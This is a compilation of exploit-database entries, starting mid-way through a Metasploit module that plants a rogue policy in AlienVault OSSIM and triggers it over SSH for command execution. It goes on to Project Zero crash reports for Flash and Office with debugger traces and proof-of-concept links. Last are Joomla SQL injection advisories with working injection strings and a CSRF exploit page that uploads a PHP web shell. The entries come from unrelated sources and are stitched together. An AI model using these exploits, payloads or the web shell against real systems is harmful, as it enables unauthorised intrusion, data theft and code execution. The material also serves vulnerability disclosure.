'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
'cookie' => cookie,
'headers' => {
'X-Forwarded-For' => rhost.to_s,
},
'vars_get' => {
'm_opt' => 'configuration',
'sm_opt' => 'threat_intelligence',
'h_opt' => 'policy'
}
})
if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
policy_ctx = $1
policy_group = $2
print_good("CTX Value found: #{policy_ctx}")
print_good("GROUP Value found: #{policy_group}")
else
fail_with(Failure::Unknown, "Unable to retrieve policy data")
end
# Creating policy that will be trigerred when SSH authentication failed due to wrong password.
print_status("Creating a policy that uses our rogue action")
policy = rand_text_alpha(15)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),
'cookie' => cookie,
'headers' => {
'X-Forwarded-For' => rhost.to_s,
},
'vars_post' => {
'descr' => policy,
'active' => '1',
'group' => policy_group,
'ctx' => policy_ctx,
'order' => '1',
'action' => 'new',
'sources[]' => '00000000000000000000000000000000',
'dests[]' => '00000000000000000000000000000000',
'portsrc[]' => '0',
'portdst[]' => '0',
'plug_type' => '1',
'plugins[0]' => 'on',
'taxfilters[]' =>'25@2@0',
'tax_pt' => '0',
'tax_cat' => '0',
'tax_subc' => '0',
'mboxs[]' => '00000000000000000000000000000000',
'rep_act' => '0',
'rep_sev' => '1',
'rep_rel' => '1',
'rep_dir' => '0',
'ev_sev' => '1',
'ev_rel' => '1',
'tzone' => 'Europe/Istanbul',
'date_type' => '1',
'begin_hour' => '0',
'begin_minute' => '0',
'begin_day_week' => '1',
'begin_day_month' => '1',
'begin_month' => '1',
'end_hour' => '23',
'end_minute' => '59',
'end_day_week' => '7',
'end_day_month' => '31',
'end_month' => '12',
'actions[]' => action_id,
'sim' => '1',
'priority' => '1',
'qualify' => '1',
'correlate' => '0',
'cross_correlate' => '0',
'store' => '0'
}
})
if res && res.code == 200
print_good("Policy created: #{policy}")
else
fail_with(Failure::Unknown, "Unable to create policy id")
end
# We gotta reload all policies in order to make our rogue one enabled.
print_status("Activating the policy")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
'cookie' => cookie,
'headers' => {
'X-Forwarded-For' => rhost.to_s,
},
'vars_get' => {
'what' => 'policies',
'back' => '../policy/policy.php'
}
})
if res && res.code == 200
print_good("Rogue policy activated")
else
fail_with(Failure::Unknown, "#{peer} - Unable to enable rogue policy")
end
# We will trigger the rogue policy by doing ssh auth attempt with invalid credential :-)
factory = ssh_socket_factory
opts = {
auth_methods: ['password'],
port: 22,
use_agent: false,
config: false,
password: rand_text_alpha(15),
proxy: factory,
non_interactive: true
}
print_status("Triggering the policy by performing SSH login attempt")
begin
Net::SSH.start(rhost, "root", opts)
rescue Net::SSH::AuthenticationFailed
print_good("SSH - Failed authentication. That means our policy and action will be trigged..!")
rescue Net::SSH::Exception => e
print_error("SSH Error: #{e.class} : #{e.message}")
return nil
end
end
end
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1008
The attached FLV file causes a heap overflow in YUVPlane decoding.
To reproduce, put LoadMP4.swf and yuvplane.flv on a server, and visit 127.0.0.1/LoadMP4.swf?file=yvplane.flv.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41423.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1007
The attached swf causes a use-after-free in applying bitmap filters.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41422.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1013
The attached fuzzed swf causes stack corruption when it is loaded, likely due to the parsing of the SWF file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41421.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1018
There is an overflow in MP4 AMF parsing. To reproduce, put the attached files on a server and visit http://127.0.0.1/LoadMP4.swf?file=unsigned.mp4.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41420.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=951
Platform: GDI on Windows 7 x86 reachable from Microsoft Office 2010
Class: Out of bounds memory access
The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled.
Attached files:
2167705722.ppt: fuzzed crashing file
File versions:
gdi32.dll: 6.1.7601.23457
gdiplus.dll: 6.1.7601.23508
gfx.dll: 14.0.7104.5000
oart.dll: 14.0.7169.5000
(788.ca0): Access violation - code c0000005 (first chance)
eax=00000000 ebx=0747bc5c ecx=00000001 edx=16ab9fd8 esi=1c45dcb8 edi=223e3000
eip=77667a68 esp=1c45dc78 ebp=1c45dc84 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
GDI32!ConvertDxArray+0x3c:
77667a68 8b07 mov eax,dword ptr [edi] ds:0023:223e3000=????????
0:014> kb
ChildEBP RetAddr Args to Child
1c45dc84 7765a2b3 000003a8 0747bc5c 223e2ff0 GDI32!ConvertDxArray+0x3c
1c45e6dc 776442e7 1f210a94 0000001b 00000093 GDI32!MF_ExtTextOut+0x3b4
1c45ec48 776405dc 1f210a94 0000001b 00000093 GDI32!ExtTextOutInternalA+0x156
1c45ec74 7764969c 1f210a94 0000001b 00000093 GDI32!ExtTextOutA+0x24
1c45ed5c 7764e40f 1f210a94 0ab42fc8 0747bc42 GDI32!PlayMetaFileRecord+0x1bc7
1c45ede0 7764e441 21464dc0 0000000c 00000000 GDI32!CommonEnumMetaFile+0x24d
1c45edf8 741fb1c0 1f210a94 2a260a92 7764438a GDI32!PlayMetaFile+0x1f
1c45ee60 741fb65b 2a260a92 43b405d9 46123597 GdiPlus!GetEmfFromWmfData+0x420
1c45ee84 741fb768 2a260a92 1c45eec8 00000000 GdiPlus!GpMetafile::InitWmf+0xb2
1c45eea0 741fea9f 2a260a92 1c45eec8 00000000 GdiPlus!GpMetafile::GpMetafile+0x3b
1c45eef8 741ff642 19a0cd28 1c45efbc 00000000 GdiPlus!GpMetafile::ConvertToEmfPlus+0x79
1c45ef1c 741d4fc2 19a0cd28 1c45efbc 00000004 GdiPlus!GpMetafile::ConvertToEmfPlus+0x1d
1c45ef58 6b388b58 19a0cd28 1999ef28 1c45efbc GdiPlus!GdipConvertToEmfPlus+0xbf
1c45efd4 6b36f2f4 19a0cd28 00000000 1fd76f56 gfx!Ordinal841+0x12250
1c45f004 678980c2 1c45f07c 1c45f024 1fd75519 gfx!Ordinal745+0x34
1c45f090 67897d68 1c45f0e8 07430f28 21408fe0 oart!Ordinal7931+0x6d0
1c45f104 677e340d 07430f28 1c45f124 67805b69 oart!Ordinal7931+0x376
1c45f110 67805b69 1c45f2c8 1c45f1b0 6b24cceb oart!Ordinal3235+0x14a
The function GDI32!ConvertDxArray is called with codepage 936 (ANSI/OEM Simplified Chinese [PRC, Singapore]; Chinese Simplified [GB2312]) a length of 4 (DWORDs) and a source contents containing 0x00000010 0x00000000 0x00000010 0x00000000. There are two paths in this function, one that operates on 4 byte boundaries and one that operates on 8 byte boundaries depending on the last argument where true indicates an 8-byte boundary and false indicates a 4-byte boundary. Both paths have the same issue. Pseudocode for one path in the function is:
...
else if ( (unsigned int)current < result )
{
cur_dest = (unsigned int *)dest;
cur_src = (unsigned int *)src;
do
{
dbcs_ret = IsDBCSLeadByteEx(CodePage, *current++);
dbcs_flag = dbcs_ret == 0;
tmp = *cur_src;
*cur_dest = tmp;
if ( !dbcs_flag )
{
++cur_src;
tmp = *cur_src; // crash here
++current;
*cur_dest += tmp;
}
++cur_src;
++cur_dest;
}
while ( (unsigned int)current < end );
}
The issue here is that when dbcs_flag is false the 4 byte boundary version can actually process 8 bytes of the source buffer (cur_src is incremented twice) and the 8 byte version is capable of processing 16 bytes per iteration. The length checks in this function do not verify this behavior to be in bounds. However, the most likely exploitation scenario will be a memory disclosure because cur_dest is not written to out of bounds. The value in tmp is instead added to the contents of cur_dest.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41419.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=950
Platform: Microsoft Office 2010 on Windows 7 x86
Class: Time of check time of use leading to memory corruption
The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled. This crash is non-deterministic and will not reproduce in all instances but the crash demonstrated a high degree of reliability.
Attached files:
910494862.ppt: fuzzed crashing file
File versions:
mso.dll: 14.0.7173.5000
oart.dll: 14.0.7169.5000
ppcore.dll: 14.0.7173.5000
(510.66c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1a6f0fb0 ebx=3c782fc4 ecx=1a53cfe0 edx=000004bf esi=1a53cfe0 edi=1a4d6fc0
eip=66acdf93 esp=0013d8b0 ebp=0013d8bc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
mso!Ordinal4899+0xd33:
66acdf93 f6465804 test byte ptr [esi+58h],4 ds:0023:1a53d038=??
0:000> uf 0x66acdf8b
mso!Ordinal4899+0xd2b:
66acdf8b 55 push ebp
66acdf8c 8bec mov ebp,esp
66acdf8e 51 push ecx
66acdf8f 51 push ecx
66acdf90 56 push esi
66acdf91 8bf1 mov esi,ecx
=> 66acdf93 f6465804 test byte ptr [esi+58h],4
Call Stack:
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0013d8bc 66ba7720 00000000 1a9d6f98 66ad3d33 mso!Ordinal4899+0xd33
0013d948 67908f0d 1a996e30 1a9d6f98 0000001a mso!Ordinal4720+0x201
0013d980 67906400 0013d9fc 679063f4 0013d9fc oart!Ordinal7979+0x35
0013d994 67908f30 2cccaf58 0013d9fc 0013d9cc oart!Ordinal2490+0x10b
0013d9a4 677e2a14 0013d9fc 1a4d6fd8 1a984ff0 oart!Ordinal7979+0x58
0013d9cc 677e2999 1a4d6ff0 0013d9fc 0013da0c oart!Ordinal6+0xc4
0013d9dc 6788730f 0013d9fc 3a5fe1a5 1a554f8c oart!Ordinal6+0x49
0013da0c 68c8e465 3c782fc4 3a5ff871 68b7e504 oart!Ordinal1989+0xaa
0013da44 68c985dd 3a5fc635 0013e4b4 68b8661c ppcore!PPMain+0x9130c
0013e400 68d0540f 00000000 3c886ea0 00000001 ppcore!PPMain+0x9b484
In this crash the pointer being dereferenced in esi is being tested for a flag value. However, the pointer is referencing invalid memory generating an access violation. The esi value came from the ecx register which is presumably the this pointer. Previous chunk at esi-0x58 is valid memory but 0x58 is beyond that allocated size of that chunk:
0:000> !heap -p -a 19841038
address 19841038 found in
_DPH_HEAP_ROOT @ 11a1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
197f1d9c: 19840fe0 20 - 19840000 2000
70588e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
778c616e ntdll!RtlDebugAllocateHeap+0x00000030
7788a08b ntdll!RtlpAllocateHeap+0x000000c4
77855920 ntdll!RtlAllocateHeap+0x0000023a
710ead1a vrfcore!VerifierSetAPIClassName+0x000000aa
6d7b16ac vfbasics+0x000116ac
60b20233 mso!Ordinal9052+0x0000713f
67808744 oart!Ordinal2033+0x00000090
678086ab oart!Ordinal6561+0x000000ac
6781af9f oart!Ordinal5870+0x00000060
Looking at the calling function:
0:000> uf 0x66ba76ef
mso!Ordinal4720+0x1d0:
66ba76ef 56 push esi
66ba76f0 8bf1 mov esi,ecx
66ba76f2 e8a7ddfaff call mso!Ordinal8038+0x461 (66b5549e) ; first call
66ba76f7 85c0 test eax,eax
66ba76f9 7427 je mso!Ordinal4720+0x203 (66ba7722)
mso!Ordinal4720+0x1dc:
66ba76fb 8bce mov ecx,esi
66ba76fd e89cddfaff call mso!Ordinal8038+0x461 (66b5549e) ; second call
66ba7702 83781400 cmp dword ptr [eax+14h],0
66ba7706 741a je mso!Ordinal4720+0x203 (66ba7722)
mso!Ordinal4720+0x1e9:
66ba7708 8bce mov ecx,esi
66ba770a e88fddfaff call mso!Ordinal8038+0x461 (66b5549e) ; third call
66ba770f 8b4014 mov eax,dword ptr [eax+14h]
66ba7712 8b4810 mov ecx,dword ptr [eax+10h] ; crashing ecx value
66ba7715 85c9 test ecx,ecx
66ba7717 7413 je mso!Ordinal4720+0x20d (66ba772c)
mso!Ordinal4720+0x1fa:
66ba7719 6a00 push 0
66ba771b e86b68f2ff call mso!Ordinal4899+0xd2b (66acdf8b) ; crashing function
66ba7720 5e pop esi
66ba7721 c3 ret
mso!Ordinal4720+0x203:
66ba7722 f6465804 test byte ptr [esi+58h],4 ; same check as crashing function
66ba7726 7404 je mso!Ordinal4720+0x20d (66ba772c)
mso!Ordinal4720+0x209:
66ba7728 8bce mov ecx,esi
66ba772a ebed jmp mso!Ordinal4720+0x1fa (66ba7719)
mso!Ordinal4720+0x20d:
66ba772c b8ff0f0000 mov eax,0FFFh
66ba7731 5e pop esi
66ba7732 c3 ret
Looking at the logic flow from this function we see at the very first call to mso!Ordinal8038+0x461 must return a non-null value or else the same check in the crashing function is performed in the calling function. With a non-null return this same function is called again only this time the value at [eax+0x14h] is checked to be non-null. If this second check passed then the we call the same function a third time! This time we follow the pointer at [[eax+0x14]+0x10] and check it to be non-null before passing it to the crashing function. Given the repeating calls to the same function and the non-determinism of the bug I suspect this is a time of check time of use bug on the object implementing these methods.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41418.zip
# # # # #
# Exploit Title: Joomla! Component OS Services Booking v2.5.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_osservicesbooking
# Date: 18.02.2017
# Vendor Homepage: https://www.joomdonation.com/
# Software Buy: https://www.joomdonation.com/joomla-extensions/joomla-services-appointment-booking.html
# Demo: http://osb.ext4joomla.com/
# Version: 2.5.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&task=default_showmap&vid=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=[SQL]
# Etc..
# # # # #
# Exploit Title: RSS News AutoPilot Script 1.0.1 / 3.0.3 - CSRF to
Persistent XSS and RCE Through Unrestricted File Upload
# Date: 30 August 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Software Link: https://codecanyon.net/item/rss-news-autopilot-script/11812898
# Version: 1.0.1 to 3.0.3
----------------------------------------------------------------------------------------------------------------------
RSS News AutoPilot Script File:
http://www.mediafire.com/file/6dmegm8ak1jv2u1/rss.zip
Description:
An Attackers are able to execute js and php code on web
application using RSS News - AutoPilot Script which allow an attacker to
create a post when an authenticated user/admin browses a special
crafted web page. Also, all the process was possible without any
authenticated user/admin for more info watch the below PoC Video.
The title parameter was not filtering special characters mean
vulnerable to XSS and while uploading image they weren't filtering the file
type mean vulnerable to unrestricted file upload. So, now by creating CSRF
exploit code for posting
an article with XSS alert JS payload as title of post and php file as a
image. Now if the
attacker is able to perform CSRF attack sucessfully then XSS will be
triggered and we can execute php code too.
PoC Video: https://youtu.be/znDgv8K0yFk
CSRF Exploit Code:
<html>
<body>
<title>[RSS News - AutoPilot Script] CSRF to Persistent XSS and
RCE</title>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/news.php?case=add", true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---------------------------2331884730649");
xhr.withCredentials = true;
var body = "-----------------------------2331884730649\r\n" +
"Content-Disposition: form-data; name=\"title\"\r\n" +
"\r\n" +
"Test\r\n" +
"-----------------------------2331884730649\r\n" +
"Content-Disposition: form-data; name=\"category_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------2331884730649\r\n" +
"Content-Disposition: form-data; name=\"thumbnail\";
filename=\"lod.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php echo \'\x3cform action=\"\" method=\"post\"
enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"\x3e\';
echo \'\x3cinput type=\"file\" name=\"file\" size=\"50\"\x3e\x3cinput
name=\"_upl\" type=\"submit\" id=\"_upl\"
value=\"Upload\"\x3e\x3c/form\x3e\'; if( $_POST[\'_upl\'] == \"Upload\" ) {
if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) {
echo \'\x3cb\x3eUpload Sukses!!!\x3cb\x3e\x3cbr\x3e\x3cbr\x3e\'; } else {
echo \'\x3cb\x3eGagal Upload!!!\x3c/b\x3e\x3cbr\x3e\x3cbr\x3e\'; } } ?\x3e
\r\n" +
"\r\n" +
"-----------------------------2331884730649\r\n" +
"Content-Disposition: form-data; name=\"details\"\r\n" +
"\r\n" +
"\x3cp\x3etest\x3c/p\x3e\r\n" +
"-----------------------------2331884730649\r\n" +
"Content-Disposition: form-data; name=\"published\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------2331884730649\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2331884730649--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<br><br><br>
<center>
<h2><font color="red">[RSS News - AutoPilot Script] CSRF to Persistent
XSS and RCE</font></h2>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</center>
</body>
</html>
Vendor Shouted Urgent Update:
http://wpsup.com/products/rss-news-script/urgent-update-fix-security-bugs/
Fix/Patch: Update to latest version.
----------------------------------------------------------------------------------------------------------------------
Regards,
Arbin Godar
https://twitter.com/arbingodar
# # # # #
# Exploit Title: Joomla! Component Bazaar Platform v3.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_bazaar
# Date: 18.02.2017
# Vendor Homepage: http://matamko.com/
# Software Buy: http://matamko.com/products/bazaar/live-demo
# Demo: http://matamko.com/products/bazaar/live-demo
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=[SQL]
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=[SQL]
# 1'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/index.php?option=com_bazaar&view=product&productid=[SQL]
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# Etc...
# # # # #
# # # # #
# Exploit Title: Joomla! Component Room Management v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_roommgmt
# Date: 18.02.2017
# Vendor Homepage: http://matamko.com/
# Software Buy: http://matamko.com/products/room-management/live-demo
# Demo: http://matamko.com/products/room-management/live-demo
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/room/book?tmpl=component&id=5&date=[SQL]
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=[SQL]
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=0&id=[SQL]
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# Etc...
# # # # #
# # # # #
# Exploit Title: Joomla! Component OS Property v3.0.8 - SQL Injection
# Google Dork: inurl:index.php?option=com_osproperty
# Date: 18.02.2017
# Vendor Homepage: https://www.joomdonation.com/
# Software Buy: https://www.joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html
# Demo: http://osproperty.ext4joomla.com/
# Version: 3.0.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_osproperty&view=ltype&catIds[0]=[SQL]
# # # # #